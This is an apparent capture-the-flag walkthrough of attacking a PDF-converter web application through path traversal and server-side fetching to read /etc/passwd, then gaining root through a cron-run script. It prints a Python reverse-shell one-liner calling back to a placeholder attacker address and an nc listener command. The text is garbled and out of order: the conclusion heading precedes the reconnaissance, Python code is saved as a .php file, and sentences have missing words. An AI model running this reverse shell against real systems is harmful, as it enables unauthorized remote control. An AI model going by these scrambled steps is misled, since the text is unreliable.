
chmod

Create an exploit.php script on your public-facing web server with the following code:

import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.x.x",4445)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

Set up a new listener:

nc -lvnp 4445

Wait for the cron job to execute, giving us a root shell.

6. Conclusion and Key Takeaways

Next, we access the web application hosted on port 80. The website appears to be a simple PDF converter, allowing users to upload PDF files and convert them to other formats. However, upon closer inspection, we notice that the website uses a peculiar URL parameter, file, which seems to be vulnerable to path traversal attacks.

We discover a script that runs a Python command or parses a file we can modify. Locate a script that is executed by root. Modify the script to include a reverse shell:

The backend returns the newly generated PDF filename. When you open or view the document in the provided , you will see a text printout of the server’s /etc/passwd configuration file right on your screen.

The server responds with a PDF file, which is placed at /static/pdfs/<random_hash>.pdf. This flow shows that the backend fetches the provided URL, converts the content into a PDF, and stores it for retrieval.

Create a file named index.html in the root of your local web server's directory.